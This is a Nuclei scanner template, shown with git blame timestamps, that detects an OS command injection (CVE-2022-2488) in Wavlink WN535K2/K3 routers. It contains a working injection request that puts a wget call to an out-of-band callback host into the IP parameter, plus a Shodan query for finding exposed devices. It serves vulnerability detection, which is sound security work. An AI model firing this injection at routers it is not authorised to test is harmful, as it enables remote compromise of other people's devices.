nuclei-templates/cves/2022/CVE-2022-2488.yaml

42 lines
1.3 KiB
YAML
Raw Normal View History

2022-07-20 18:16:26 +00:00
id: CVE-2022-2488
info:
name: Wavlink WN535K2/WN535K3 - OS Command Injection
2022-07-20 18:16:26 +00:00
author: For3stCo1d
severity: critical
2022-07-20 18:35:06 +00:00
description: |
Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in /cgi-bin/touchlist_sync.cgi via manipulation of the argument IP. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
2022-07-20 18:16:26 +00:00
reference:
- https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20touchlist_sync.cgi.md
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2488
- https://vuldb.com/?id.204539
- https://nvd.nist.gov/vuln/detail/CVE-2022-2488
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-2488
cwe-id: CWE-78
2022-07-20 18:16:26 +00:00
metadata:
shodan-query: http.title:"Wi-Fi APP Login"
verified: "true"
2022-07-21 08:45:40 +00:00
tags: cve,cve2022,iot,wavlink,router,rce,oast
2022-07-20 18:16:26 +00:00
requests:
- raw:
- |
GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://{{interactsh-url}}; HTTP/1.1
Host: {{Hostname}}
2022-07-21 08:45:40 +00:00
matchers-condition: and
2022-07-20 18:16:26 +00:00
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
2022-07-21 08:45:40 +00:00
- type: status
status:
- 500
# Enhanced by md on 2022/10/06